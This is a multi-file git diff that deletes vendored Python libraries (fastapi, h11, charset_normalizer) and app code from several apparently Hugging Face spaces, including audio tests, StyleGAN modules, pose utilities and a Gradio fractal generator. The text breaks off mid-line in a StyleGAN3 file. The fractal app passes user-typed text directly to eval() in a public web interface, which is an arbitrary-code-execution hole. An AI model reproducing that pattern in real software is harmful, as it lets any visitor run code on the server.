- if is_multi_byte_decoder and i > 0: - chunk_partial_size_chk: int = min(chunk_size, 16) - - if ( - decoded_payload - and chunk[:chunk_partial_size_chk] not in decoded_payload - ): - for j in range(i, i - 4, -1): - cut_sequence = sequences[j:chunk_end] - - if bom_or_sig_available and strip_sig_or_bom is False: - cut_sequence = sig_payload + cut_sequence - - chunk = cut_sequence.decode(encoding_iana, errors="ignore") - - if chunk[:chunk_partial_size_chk] in decoded_payload: - break - - yield chunk diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/fastapi/utils.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/fastapi/utils.py deleted file mode 100644 index 267d64ce8aee9eaf5462d9cbd47deca44cfdef28..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/fastapi/utils.py +++ /dev/null @@ -1,228 +0,0 @@ -import re -import warnings -from dataclasses import is_dataclass -from typing import ( - TYPE_CHECKING, - Any, - Dict, - MutableMapping, - Optional, - Set, - Type, - Union, - cast, -) -from weakref import WeakKeyDictionary - -import fastapi -from fastapi._compat import ( - PYDANTIC_V2, - BaseConfig, - ModelField, - PydanticSchemaGenerationError, - Undefined, - UndefinedType, - Validator, - lenient_issubclass, -) -from fastapi.datastructures import DefaultPlaceholder, DefaultType -from pydantic import BaseModel, create_model -from pydantic.fields import FieldInfo -from typing_extensions import Literal - -if TYPE_CHECKING: # pragma: nocover - from .routing import APIRoute - -# Cache for `create_cloned_field` -_CLONED_TYPES_CACHE: MutableMapping[ - Type[BaseModel], Type[BaseModel] -] = WeakKeyDictionary() - - -def is_body_allowed_for_status_code(status_code: Union[int, str, None]) -> bool: - if status_code is None: - return True - # Ref: https://github.com/OAI/OpenAPI-Specification/blob/main/versions/3.1.0.md#patterned-fields-1 - if status_code in { - "default", - "1XX", - "2XX", - "3XX", - 
"4XX", - "5XX", - }: - return True - current_status_code = int(status_code) - return not (current_status_code < 200 or current_status_code in {204, 304}) - - -def get_path_param_names(path: str) -> Set[str]: - return set(re.findall("{(.*?)}", path)) - - -def create_response_field( - name: str, - type_: Type[Any], - class_validators: Optional[Dict[str, Validator]] = None, - default: Optional[Any] = Undefined, - required: Union[bool, UndefinedType] = Undefined, - model_config: Type[BaseConfig] = BaseConfig, - field_info: Optional[FieldInfo] = None, - alias: Optional[str] = None, - mode: Literal["validation", "serialization"] = "validation", -) -> ModelField: - """ - Create a new response field. Raises if type_ is invalid. - """ - class_validators = class_validators or {} - if PYDANTIC_V2: - field_info = field_info or FieldInfo( - annotation=type_, default=default, alias=alias - ) - else: - field_info = field_info or FieldInfo() - kwargs = {"name": name, "field_info": field_info} - if PYDANTIC_V2: - kwargs.update({"mode": mode}) - else: - kwargs.update( - { - "type_": type_, - "class_validators": class_validators, - "default": default, - "required": required, - "model_config": model_config, - "alias": alias, - } - ) - try: - return ModelField(**kwargs) # type: ignore[arg-type] - except (RuntimeError, PydanticSchemaGenerationError): - raise fastapi.exceptions.FastAPIError( - "Invalid args for response field! Hint: " - f"check that {type_} is a valid Pydantic field type. " - "If you are using a return type annotation that is not a valid Pydantic " - "field (e.g. Union[Response, dict, None]) you can disable generating the " - "response model from the type annotation with the path operation decorator " - "parameter response_model=None. 
Read more: " - "https://fastapi.tiangolo.com/tutorial/response-model/" - ) from None - - -def create_cloned_field( - field: ModelField, - *, - cloned_types: Optional[MutableMapping[Type[BaseModel], Type[BaseModel]]] = None, -) -> ModelField: - if PYDANTIC_V2: - return field - # cloned_types caches already cloned types to support recursive models and improve - # performance by avoiding unecessary cloning - if cloned_types is None: - cloned_types = _CLONED_TYPES_CACHE - - original_type = field.type_ - if is_dataclass(original_type) and hasattr(original_type, "__pydantic_model__"): - original_type = original_type.__pydantic_model__ - use_type = original_type - if lenient_issubclass(original_type, BaseModel): - original_type = cast(Type[BaseModel], original_type) - use_type = cloned_types.get(original_type) - if use_type is None: - use_type = create_model(original_type.__name__, __base__=original_type) - cloned_types[original_type] = use_type - for f in original_type.__fields__.values(): - use_type.__fields__[f.name] = create_cloned_field( - f, cloned_types=cloned_types - ) - new_field = create_response_field(name=field.name, type_=use_type) - new_field.has_alias = field.has_alias # type: ignore[attr-defined] - new_field.alias = field.alias # type: ignore[misc] - new_field.class_validators = field.class_validators # type: ignore[attr-defined] - new_field.default = field.default # type: ignore[misc] - new_field.required = field.required # type: ignore[misc] - new_field.model_config = field.model_config # type: ignore[attr-defined] - new_field.field_info = field.field_info - new_field.allow_none = field.allow_none # type: ignore[attr-defined] - new_field.validate_always = field.validate_always # type: ignore[attr-defined] - if field.sub_fields: # type: ignore[attr-defined] - new_field.sub_fields = [ # type: ignore[attr-defined] - create_cloned_field(sub_field, cloned_types=cloned_types) - for sub_field in field.sub_fields # type: ignore[attr-defined] - ] - if 
field.key_field: # type: ignore[attr-defined] - new_field.key_field = create_cloned_field( # type: ignore[attr-defined] - field.key_field, cloned_types=cloned_types # type: ignore[attr-defined] - ) - new_field.validators = field.validators # type: ignore[attr-defined] - new_field.pre_validators = field.pre_validators # type: ignore[attr-defined] - new_field.post_validators = field.post_validators # type: ignore[attr-defined] - new_field.parse_json = field.parse_json # type: ignore[attr-defined] - new_field.shape = field.shape # type: ignore[attr-defined] - new_field.populate_validators() # type: ignore[attr-defined] - return new_field - - -def generate_operation_id_for_path( - *, name: str, path: str, method: str -) -> str: # pragma: nocover - warnings.warn( - "fastapi.utils.generate_operation_id_for_path() was deprecated, " - "it is not used internally, and will be removed soon", - DeprecationWarning, - stacklevel=2, - ) - operation_id = name + path - operation_id = re.sub(r"\W", "_", operation_id) - operation_id = operation_id + "_" + method.lower() - return operation_id - - -def generate_unique_id(route: "APIRoute") -> str: - operation_id = route.name + route.path_format - operation_id = re.sub(r"\W", "_", operation_id) - assert route.methods - operation_id = operation_id + "_" + list(route.methods)[0].lower() - return operation_id - - -def deep_dict_update(main_dict: Dict[Any, Any], update_dict: Dict[Any, Any]) -> None: - for key, value in update_dict.items(): - if ( - key in main_dict - and isinstance(main_dict[key], dict) - and isinstance(value, dict) - ): - deep_dict_update(main_dict[key], value) - elif ( - key in main_dict - and isinstance(main_dict[key], list) - and isinstance(update_dict[key], list) - ): - main_dict[key] = main_dict[key] + update_dict[key] - else: - main_dict[key] = value - - -def get_value_or_default( - first_item: Union[DefaultPlaceholder, DefaultType], - *extra_items: Union[DefaultPlaceholder, DefaultType], -) -> 
Union[DefaultPlaceholder, DefaultType]: - """ - Pass items or `DefaultPlaceholder`s by descending priority. - - The first one to _not_ be a `DefaultPlaceholder` will be returned. - - Otherwise, the first item (a `DefaultPlaceholder`) will be returned. - """ - items = (first_item,) + extra_items - for item in items: - if not isinstance(item, DefaultPlaceholder): - return item - return first_item - - -def match_pydantic_error_url(error_type: str) -> Any: - from dirty_equals import IsStr - - return IsStr(regex=rf"^https://errors\.pydantic\.dev/.*/v/{error_type}") diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/h11/_util.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/h11/_util.py deleted file mode 100644 index 6718445290770e028ea2f1f662026c9a0b0991db..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/h11/_util.py +++ /dev/null @@ -1,135 +0,0 @@ -from typing import Any, Dict, NoReturn, Pattern, Tuple, Type, TypeVar, Union - -__all__ = [ - "ProtocolError", - "LocalProtocolError", - "RemoteProtocolError", - "validate", - "bytesify", -] - - -class ProtocolError(Exception): - """Exception indicating a violation of the HTTP/1.1 protocol. - - This as an abstract base class, with two concrete base classes: - :exc:`LocalProtocolError`, which indicates that you tried to do something - that HTTP/1.1 says is illegal, and :exc:`RemoteProtocolError`, which - indicates that the remote peer tried to do something that HTTP/1.1 says is - illegal. See :ref:`error-handling` for details. - - In addition to the normal :exc:`Exception` features, it has one attribute: - - .. attribute:: error_status_hint - - This gives a suggestion as to what status code a server might use if - this error occurred as part of a request. - - For a :exc:`RemoteProtocolError`, this is useful as a suggestion for - how you might want to respond to a misbehaving peer, if you're - implementing a server. 
- - For a :exc:`LocalProtocolError`, this can be taken as a suggestion for - how your peer might have responded to *you* if h11 had allowed you to - continue. - - The default is 400 Bad Request, a generic catch-all for protocol - violations. - - """ - - def __init__(self, msg: str, error_status_hint: int = 400) -> None: - if type(self) is ProtocolError: - raise TypeError("tried to directly instantiate ProtocolError") - Exception.__init__(self, msg) - self.error_status_hint = error_status_hint - - -# Strategy: there are a number of public APIs where a LocalProtocolError can -# be raised (send(), all the different event constructors, ...), and only one -# public API where RemoteProtocolError can be raised -# (receive_data()). Therefore we always raise LocalProtocolError internally, -# and then receive_data will translate this into a RemoteProtocolError. -# -# Internally: -# LocalProtocolError is the generic "ProtocolError". -# Externally: -# LocalProtocolError is for local errors and RemoteProtocolError is for -# remote errors. -class LocalProtocolError(ProtocolError): - def _reraise_as_remote_protocol_error(self) -> NoReturn: - # After catching a LocalProtocolError, use this method to re-raise it - # as a RemoteProtocolError. This method must be called from inside an - # except: block. - # - # An easy way to get an equivalent RemoteProtocolError is just to - # modify 'self' in place. - self.__class__ = RemoteProtocolError # type: ignore - # But the re-raising is somewhat non-trivial -- you might think that - # now that we've modified the in-flight exception object, that just - # doing 'raise' to re-raise it would be enough. But it turns out that - # this doesn't work, because Python tracks the exception type - # (exc_info[0]) separately from the exception object (exc_info[1]), - # and we only modified the latter. So we really do need to re-raise - # the new type explicitly. 
- # On py3, the traceback is part of the exception object, so our - # in-place modification preserved it and we can just re-raise: - raise self - - -class RemoteProtocolError(ProtocolError): - pass - - -def validate( - regex: Pattern[bytes], data: bytes, msg: str = "malformed data", *format_args: Any -) -> Dict[str, bytes]: - match = regex.fullmatch(data) - if not match: - if format_args: - msg = msg.format(*format_args) - raise LocalProtocolError(msg) - return match.groupdict() - - -# Sentinel values -# -# - Inherit identity-based comparison and hashing from object -# - Have a nice repr -# - Have a *bonus property*: type(sentinel) is sentinel -# -# The bonus property is useful if you want to take the return value from -# next_event() and do some sort of dispatch based on type(event). - -_T_Sentinel = TypeVar("_T_Sentinel", bound="Sentinel") - - -class Sentinel(type): - def __new__( - cls: Type[_T_Sentinel], - name: str, - bases: Tuple[type, ...], - namespace: Dict[str, Any], - **kwds: Any - ) -> _T_Sentinel: - assert bases == (Sentinel,) - v = super().__new__(cls, name, bases, namespace, **kwds) - v.__class__ = v # type: ignore - return v - - def __repr__(self) -> str: - return self.__name__ - - -# Used for methods, request targets, HTTP versions, header names, and header -# values. Accepts ascii-strings, or bytes/bytearray/memoryview/..., and always -# returns bytes. 
-def bytesify(s: Union[bytes, bytearray, memoryview, int, str]) -> bytes: - # Fast-path: - if type(s) is bytes: - return s - if isinstance(s, str): - s = s.encode("ascii") - if isinstance(s, int): - raise TypeError("expected bytes-like object, not int") - return bytes(s) diff --git a/spaces/Datasculptor/MusicGen/tests/data/test_audio_utils.py b/spaces/Datasculptor/MusicGen/tests/data/test_audio_utils.py deleted file mode 100644 index 0480671bb17281d61ce02bce6373a5ccec89fece..0000000000000000000000000000000000000000 --- a/spaces/Datasculptor/MusicGen/tests/data/test_audio_utils.py +++ /dev/null @@ -1,110 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import julius -import torch -import pytest - -from audiocraft.data.audio_utils import ( - _clip_wav, - convert_audio_channels, - convert_audio, - normalize_audio -) -from ..common_utils import get_batch_white_noise - - -class TestConvertAudioChannels: - - def test_convert_audio_channels_downmix(self): - b, c, t = 2, 3, 100 - audio = get_batch_white_noise(b, c, t) - mixed = convert_audio_channels(audio, channels=2) - assert list(mixed.shape) == [b, 2, t] - - def test_convert_audio_channels_nochange(self): - b, c, t = 2, 3, 100 - audio = get_batch_white_noise(b, c, t) - mixed = convert_audio_channels(audio, channels=c) - assert list(mixed.shape) == list(audio.shape) - - def test_convert_audio_channels_upmix(self): - b, c, t = 2, 1, 100 - audio = get_batch_white_noise(b, c, t) - mixed = convert_audio_channels(audio, channels=3) - assert list(mixed.shape) == [b, 3, t] - - def test_convert_audio_channels_upmix_error(self): - b, c, t = 2, 2, 100 - audio = get_batch_white_noise(b, c, t) - with pytest.raises(ValueError): - convert_audio_channels(audio, channels=3) - - -class TestConvertAudio: - - def test_convert_audio_channels_downmix(self): - b, c, dur = 2, 3, 
4. - sr = 128 - audio = get_batch_white_noise(b, c, int(sr * dur)) - out = convert_audio(audio, from_rate=sr, to_rate=sr, to_channels=2) - assert list(out.shape) == [audio.shape[0], 2, audio.shape[-1]] - - def test_convert_audio_channels_upmix(self): - b, c, dur = 2, 1, 4. - sr = 128 - audio = get_batch_white_noise(b, c, int(sr * dur)) - out = convert_audio(audio, from_rate=sr, to_rate=sr, to_channels=3) - assert list(out.shape) == [audio.shape[0], 3, audio.shape[-1]] - - def test_convert_audio_upsample(self): - b, c, dur = 2, 1, 4. - sr = 2 - new_sr = 3 - audio = get_batch_white_noise(b, c, int(sr * dur)) - out = convert_audio(audio, from_rate=sr, to_rate=new_sr, to_channels=c) - out_j = julius.resample.resample_frac(audio, old_sr=sr, new_sr=new_sr) - assert torch.allclose(out, out_j) - - def test_convert_audio_resample(self): - b, c, dur = 2, 1, 4. - sr = 3 - new_sr = 2 - audio = get_batch_white_noise(b, c, int(sr * dur)) - out = convert_audio(audio, from_rate=sr, to_rate=new_sr, to_channels=c) - out_j = julius.resample.resample_frac(audio, old_sr=sr, new_sr=new_sr) - assert torch.allclose(out, out_j) - - -class TestNormalizeAudio: - - def test_clip_wav(self): - b, c, dur = 2, 1, 4. - sr = 3 - audio = 10.0 * get_batch_white_noise(b, c, int(sr * dur)) - _clip_wav(audio) - assert audio.abs().max() <= 1 - - def test_normalize_audio_clip(self): - b, c, dur = 2, 1, 4. - sr = 3 - audio = 10.0 * get_batch_white_noise(b, c, int(sr * dur)) - norm_audio = normalize_audio(audio, strategy='clip') - assert norm_audio.abs().max() <= 1 - - def test_normalize_audio_rms(self): - b, c, dur = 2, 1, 4. - sr = 3 - audio = 10.0 * get_batch_white_noise(b, c, int(sr * dur)) - norm_audio = normalize_audio(audio, strategy='rms') - assert norm_audio.abs().max() <= 1 - - def test_normalize_audio_peak(self): - b, c, dur = 2, 1, 4. 
- sr = 3 - audio = 10.0 * get_batch_white_noise(b, c, int(sr * dur)) - norm_audio = normalize_audio(audio, strategy='peak') - assert norm_audio.abs().max() <= 1 diff --git a/spaces/Datasculptor/StyleGAN-NADA/op/fused_act_cpu.py b/spaces/Datasculptor/StyleGAN-NADA/op/fused_act_cpu.py deleted file mode 100644 index f997dafdd53aa9f4bbe07af6746c67a2c6dcb4c7..0000000000000000000000000000000000000000 --- a/spaces/Datasculptor/StyleGAN-NADA/op/fused_act_cpu.py +++ /dev/null @@ -1,41 +0,0 @@ -import os - -import torch -from torch import nn -from torch.autograd import Function -from torch.nn import functional as F - - -module_path = os.path.dirname(__file__) - - -class FusedLeakyReLU(nn.Module): - def __init__(self, channel, negative_slope=0.2, scale=2 ** 0.5): - super().__init__() - - self.bias = nn.Parameter(torch.zeros(channel)) - self.negative_slope = negative_slope - self.scale = scale - - def forward(self, input): - return fused_leaky_relu(input, self.bias, self.negative_slope, self.scale) - -def fused_leaky_relu(input, bias=None, negative_slope=0.2, scale=2 ** 0.5): - if input.device.type == "cpu": - if bias is not None: - rest_dim = [1] * (input.ndim - bias.ndim - 1) - return ( - F.leaky_relu( - input + bias.view(1, bias.shape[0], *rest_dim), negative_slope=0.2 - ) - * scale - ) - - else: - return F.leaky_relu(input, negative_slope=0.2) * scale - - else: - return FusedLeakyReLUFunction.apply( - input.contiguous(), bias, negative_slope, scale - ) - diff --git a/spaces/DeclK/pose/tools/utils.py b/spaces/DeclK/pose/tools/utils.py deleted file mode 100644 index 9a426b03f7283da3486f19de3fff0d3430c71b61..0000000000000000000000000000000000000000 --- a/spaces/DeclK/pose/tools/utils.py +++ /dev/null @@ -1,120 +0,0 @@ -from mmdet.datasets import CocoDataset -import time -from pathlib import Path -from ffmpy import FFmpeg -import shutil -import tempfile -from easydict import EasyDict -import numpy as np - -def coco_keypoint_id_table(reverse=False): - id2name = { 0: 'nose', - 
1: 'left_eye', - 2: 'right_eye', - 3: 'left_ear', - 4: 'right_ear', - 5: 'left_shoulder', - 6: 'right_shoulder', - 7: 'left_elbow', - 8: 'right_elbow', - 9: 'left_wrist', - 10: 'right_wrist', - 11: 'left_hip', - 12: 'right_hip', - 13: 'left_knee', - 14: 'right_knee', - 15: 'left_ankle', - 16: 'right_ankle'} - if reverse: - return {v: k for k, v in id2name.items()} - return id2name - -def get_skeleton(): - """ My skeleton links, I deleted some links from default coco style. - """ - SKELETON = EasyDict() - SKELETON.head = [[0,1], [0,2], [1,3], [2,4]] - SKELETON.left_arm = [[5, 7], [7, 9]] - SKELETON.right_arm = [[6, 8], [8, 10]] - SKELETON.left_leg = [[11, 13], [13, 15]] - SKELETON.right_leg = [[12, 14], [14, 16]] - SKELETON.body = [[5, 6], [5, 11], [6, 12], [11, 12]] - return SKELETON - -def get_keypoint_weight(low_weight_ratio=0.1, mid_weight_ratio=0.5): - """ Get keypoint weight, used in object keypoint similarity, - `low_weight_names` are points I want to pay less attention. - """ - low_weight_names = ['nose', 'left_eye', 'right_eye', 'left_ear', 'right_ear'] - mid_weight_names = ['left_shoulder', 'right_shoulder', 'left_hip', 'right_hip'] - - logtis = np.ones(17) - name2id = coco_keypoint_id_table(reverse=True) - - low_weight_id = [name2id[n] for n in low_weight_names] - mid_weight_id = [name2id[n] for n in mid_weight_names] - logtis[low_weight_id] = low_weight_ratio - logtis[mid_weight_id] = mid_weight_ratio - - weights = logtis / np.sum(logtis) - return weights - -def coco_cat_id_table(): - classes = CocoDataset.METAINFO['classes'] - id2name = {i: name for i, name in enumerate(classes)} - - return id2name - -def filter_by_catgory(bboxes, scores, labels, names): - """ Filter labels by classes - Args: - - labels: list of labels, each label is a dict - - classes: list of class names - """ - id2name = coco_cat_id_table() - # names of labels - label_names = [id2name[id] for id in labels] - # filter by class names - mask = np.isin(label_names, names) - return 
bboxes[mask], scores[mask], labels[mask] - -def filter_by_score(bboxes, scores, labels, score_thr): - """ Filter bboxes by score threshold - Args: - - bboxes: list of bboxes, each bbox is a dict - - score_thr: score threshold - """ - mask = scores > score_thr - return bboxes[mask], scores[mask], labels[mask] - -def convert_video_to_playable_mp4(video_path: str) -> str: - """ Copied from gradio - Convert the video to mp4. If something goes wrong return the original video. - """ - try: - output_path = Path(video_path).with_suffix(".mp4") - with tempfile.NamedTemporaryFile(delete=False) as tmp_file: - shutil.copy2(video_path, tmp_file.name) - # ffmpeg will automatically use h264 codec (playable in browser) when converting to mp4 - ff = FFmpeg( - inputs={str(tmp_file.name): None}, - outputs={str(output_path): None}, - global_options="-y -loglevel quiet", - ) - ff.run() - except: - print(f"Error when converting video to browser-playable format. Returning original video.") - output_path = video_path - return str(output_path) - -class Timer: - def __init__(self): - self.start_time = time.time() - - def click(self): - used_time = time.time() - self.start_time - self.start_time = time.time() - return used_time - - def start(self): - self.start_time = time.time() \ No newline at end of file diff --git a/spaces/DemoLou/moe-tts/text/sanskrit.py b/spaces/DemoLou/moe-tts/text/sanskrit.py deleted file mode 100644 index 0223aaac384a2f850f5bc20651fc18eb964607d0..0000000000000000000000000000000000000000 --- a/spaces/DemoLou/moe-tts/text/sanskrit.py +++ /dev/null @@ -1,62 +0,0 @@ -import re -from indic_transliteration import sanscript - - -# List of (iast, ipa) pairs: -_iast_to_ipa = [(re.compile('%s' % x[0]), x[1]) for x in [ - ('a', 'ə'), - ('ā', 'aː'), - ('ī', 'iː'), - ('ū', 'uː'), - ('ṛ', 'ɹ`'), - ('ṝ', 'ɹ`ː'), - ('ḷ', 'l`'), - ('ḹ', 'l`ː'), - ('e', 'eː'), - ('o', 'oː'), - ('k', 'k⁼'), - ('k⁼h', 'kʰ'), - ('g', 'g⁼'), - ('g⁼h', 'gʰ'), - ('ṅ', 'ŋ'), - ('c', 'ʧ⁼'), - ('ʧ⁼h', 'ʧʰ'), 
- ('j', 'ʥ⁼'), - ('ʥ⁼h', 'ʥʰ'), - ('ñ', 'n^'), - ('ṭ', 't`⁼'), - ('t`⁼h', 't`ʰ'), - ('ḍ', 'd`⁼'), - ('d`⁼h', 'd`ʰ'), - ('ṇ', 'n`'), - ('t', 't⁼'), - ('t⁼h', 'tʰ'), - ('d', 'd⁼'), - ('d⁼h', 'dʰ'), - ('p', 'p⁼'), - ('p⁼h', 'pʰ'), - ('b', 'b⁼'), - ('b⁼h', 'bʰ'), - ('y', 'j'), - ('ś', 'ʃ'), - ('ṣ', 's`'), - ('r', 'ɾ'), - ('l̤', 'l`'), - ('h', 'ɦ'), - ("'", ''), - ('~', '^'), - ('ṃ', '^') -]] - - -def devanagari_to_ipa(text): - text = text.replace('ॐ', 'ओम्') - text = re.sub(r'\s*।\s*$', '.', text) - text = re.sub(r'\s*।\s*', ', ', text) - text = re.sub(r'\s*॥', '.', text) - text = sanscript.transliterate(text, sanscript.DEVANAGARI, sanscript.IAST) - for regex, replacement in _iast_to_ipa: - text = re.sub(regex, replacement, text) - text = re.sub('(.)[`ː]*ḥ', lambda x: x.group(0) - [:-1]+'h'+x.group(1)+'*', text) - return text diff --git a/spaces/Demosthene-OR/avr23-cds-translation/member.py b/spaces/Demosthene-OR/avr23-cds-translation/member.py deleted file mode 100644 index e57edbfa4fc87c4a34a489e2c3fdbd8702a22696..0000000000000000000000000000000000000000 --- a/spaces/Demosthene-OR/avr23-cds-translation/member.py +++ /dev/null @@ -1,19 +0,0 @@ -class Member: - def __init__( - self, name: str, linkedin_url: str = None, github_url: str = None - ) -> None: - self.name = name - self.linkedin_url = linkedin_url - self.github_url = github_url - - def sidebar_markdown(self): - - markdown = f'{self.name}' - - if self.linkedin_url is not None: - markdown += f' linkedin ' - - if self.github_url is not None: - markdown += f' github ' - - return markdown diff --git a/spaces/DrGabrielLopez/fractal-generator/app.py b/spaces/DrGabrielLopez/fractal-generator/app.py deleted file mode 100644 index 7b7c12e4f4ea8bcc42f5406ccf1fea8eec0eb56f..0000000000000000000000000000000000000000 --- a/spaces/DrGabrielLopez/fractal-generator/app.py +++ /dev/null @@ -1,60 +0,0 @@ -import gradio as gr -from numpy import * - -from fractal_generator import FractalGenerator - -TITLE = "Fractal Generator" 
-DESCRIPTION = "
    Create your own fractal art!
    " -EXAMPLES = [ - ["Julia", "sin(z**12 + cos(0.7*z**12) + 1.41)"], - ["Julia", "sin(z**6 + cos(0.7*z**6) + tan(z**3) + 1.41)"], - ["Julia", "sin(z**7 + cos(z**5) + tanh(z**3) + 0.61)"], - ["Julia", "sin(arcsin(z**7) + arccos(z**5) + arctan(z**3) + 0.61)"], - ["Julia", "sin(arccos(z**3 - z**2 + z)+ 0.61)"], - ["Julia", "log(arccos(z**3 - z**2 + z)+ 0.61)"], - ["Julia", "sin(z**4 + 3.41)*exp(2.5*1J)"], - ["Julia", "cos(cosh(z**3) - sinh(z**2) + tanh(z**4))**2"], -] -ARTICLE = r"""
    - This application uses Julia and Mandelbrot fractal algorithms. - These plots show the convergence plot for infinitely composed complex functions
    - These functions are based on artist-defined generating functions $f(z)$ with $z \in \mathbb{C}$ as follows
    - $$ F(z) = \prod^{\infty} f(z) $$
    - Done by Dr. Gabriel Lopez
    - For more please visit: My Page
    -
    """ - -# interactive function -def plot_fractal(fractal_type: str, python_function: str): - frac = FractalGenerator(n=500, max_iter=10) - if fractal_type == "Julia": - frac.create_julia(lambda z: eval(python_function)) - elif fractal_type == "Mandelbrot": - frac.create_mandelbrot() - else: - print("Current wrong option: ", fractal_type) - return frac.plot() - - -# gradio frontend elements -in_dropdown = gr.Dropdown( - choices=["Julia", "Mandelbrot"], label="Select a type of fractal:", value="Julia" -) -in_text = gr.Textbox( - value="sin(z**4 + 1.41)", - label="Enter function using $z$ as complex-variable. You can use all numpy functions. 1J = /sqrt{-1}", - placeholder="your own z function", - lines=4, -) -out_plot = gr.Plot(label="Fractal plot") - -# gradio interface -gr.Interface( - inputs=[in_dropdown, in_text], - outputs=out_plot, - fn=plot_fractal, - examples=EXAMPLES, - title=TITLE, - description=DESCRIPTION, - article=ARTICLE, -).launch() diff --git a/spaces/DragGan/DragGan/stylegan_human/training_scripts/sg3/training/networks_stylegan3.py b/spaces/DragGan/DragGan/stylegan_human/training_scripts/sg3/training/networks_stylegan3.py deleted file mode 100644 index 3c2391bea7511ee1e8c658ec90e5b67b4380a45e..0000000000000000000000000000000000000000 --- a/spaces/DragGan/DragGan/stylegan_human/training_scripts/sg3/training/networks_stylegan3.py +++ /dev/null @@ -1,539 +0,0 @@ -# Copyright (c) SenseTime Research. All rights reserved. - -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. 
- -"""Generator architecture from the paper -"Alias-Free Generative Adversarial Networks".""" - -import numpy as np -import scipy.signal -import scipy.optimize -import torch -from torch_utils import misc -from torch_utils import persistence -from torch_utils.ops import conv2d_gradfix -from torch_utils.ops import filtered_lrelu -from torch_utils.ops import bias_act - -#---------------------------------------------------------------------------- - -@misc.profiled_function -def modulated_conv2d( - x, # Input tensor: [batch_size, in_channels, in_height, in_width] - w, # Weight tensor: [out_channels, in_channels, kernel_height, kernel_width] - s, # Style tensor: [batch_size, in_channels] - demodulate = True, # Apply weight demodulation? - padding = 0, # Padding: int or [padH, padW] - input_gain = None, # Optional scale factors for the input channels: [], [in_channels], or [batch_size, in_channels] -): - with misc.suppress_tracer_warnings(): # this value will be treated as a constant - batch_size = int(x.shape[0]) - out_channels, in_channels, kh, kw = w.shape - misc.assert_shape(w, [out_channels, in_channels, kh, kw]) # [OIkk] - misc.assert_shape(x, [batch_size, in_channels, None, None]) # [NIHW] - misc.assert_shape(s, [batch_size, in_channels]) # [NI] - - # Pre-normalize inputs. - if demodulate: - w = w * w.square().mean([1,2,3], keepdim=True).rsqrt() - s = s * s.square().mean().rsqrt() - - # Modulate weights. - w = w.unsqueeze(0) # [NOIkk] - w = w * s.unsqueeze(1).unsqueeze(3).unsqueeze(4) # [NOIkk] - - # Demodulate weights. - if demodulate: - dcoefs = (w.square().sum(dim=[2,3,4]) + 1e-8).rsqrt() # [NO] - w = w * dcoefs.unsqueeze(2).unsqueeze(3).unsqueeze(4) # [NOIkk] - - # Apply input scaling. - if input_gain is not None: - input_gain = input_gain.expand(batch_size, in_channels) # [NI] - w = w * input_gain.unsqueeze(1).unsqueeze(3).unsqueeze(4) # [NOIkk] - - # Execute as one fused op using grouped convolution. 
- x = x.reshape(1, -1, *x.shape[2:]) - w = w.reshape(-1, in_channels, kh, kw) - x = conv2d_gradfix.conv2d(input=x, weight=w.to(x.dtype), padding=padding, groups=batch_size) - x = x.reshape(batch_size, -1, *x.shape[2:]) - return x - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class FullyConnectedLayer(torch.nn.Module): - def __init__(self, - in_features, # Number of input features. - out_features, # Number of output features. - activation = 'linear', # Activation function: 'relu', 'lrelu', etc. - bias = True, # Apply additive bias before the activation function? - lr_multiplier = 1, # Learning rate multiplier. - weight_init = 1, # Initial standard deviation of the weight tensor. - bias_init = 0, # Initial value of the additive bias. - ): - super().__init__() - self.in_features = in_features - self.out_features = out_features - self.activation = activation - self.weight = torch.nn.Parameter(torch.randn([out_features, in_features]) * (weight_init / lr_multiplier)) - bias_init = np.broadcast_to(np.asarray(bias_init, dtype=np.float32), [out_features]) - self.bias = torch.nn.Parameter(torch.from_numpy(bias_init / lr_multiplier)) if bias else None - self.weight_gain = lr_multiplier / np.sqrt(in_features) - self.bias_gain = lr_multiplier - - def forward(self, x): - w = self.weight.to(x.dtype) * self.weight_gain - b = self.bias - if b is not None: - b = b.to(x.dtype) - if self.bias_gain != 1: - b = b * self.bias_gain - if self.activation == 'linear' and b is not None: - x = torch.addmm(b.unsqueeze(0), x, w.t()) - else: - x = x.matmul(w.t()) - x = bias_act.bias_act(x, b, act=self.activation) - return x - - def extra_repr(self): - return f'in_features={self.in_features:d}, out_features={self.out_features:d}, activation={self.activation:s}' - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class MappingNetwork(torch.nn.Module): - def 
__init__(self, - z_dim, # Input latent (Z) dimensionality. - c_dim, # Conditioning label (C) dimensionality, 0 = no labels. - w_dim, # Intermediate latent (W) dimensionality. - num_ws, # Number of intermediate latents to output. - num_layers = 2, # Number of mapping layers. - lr_multiplier = 0.01, # Learning rate multiplier for the mapping layers. - w_avg_beta = 0.998, # Decay for tracking the moving average of W during training. - ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.num_ws = num_ws - self.num_layers = num_layers - self.w_avg_beta = w_avg_beta - - # Construct layers. - self.embed = FullyConnectedLayer(self.c_dim, self.w_dim) if self.c_dim > 0 else None - features = [self.z_dim + (self.w_dim if self.c_dim > 0 else 0)] + [self.w_dim] * self.num_layers - for idx, in_features, out_features in zip(range(num_layers), features[:-1], features[1:]): - layer = FullyConnectedLayer(in_features, out_features, activation='lrelu', lr_multiplier=lr_multiplier) - setattr(self, f'fc{idx}', layer) - self.register_buffer('w_avg', torch.zeros([w_dim])) - - def forward(self, z, c, truncation_psi=1, truncation_cutoff=None, update_emas=False): - misc.assert_shape(z, [None, self.z_dim]) - if truncation_cutoff is None: - truncation_cutoff = self.num_ws - - # Embed, normalize, and concatenate inputs. - x = z.to(torch.float32) - x = x * (x.square().mean(1, 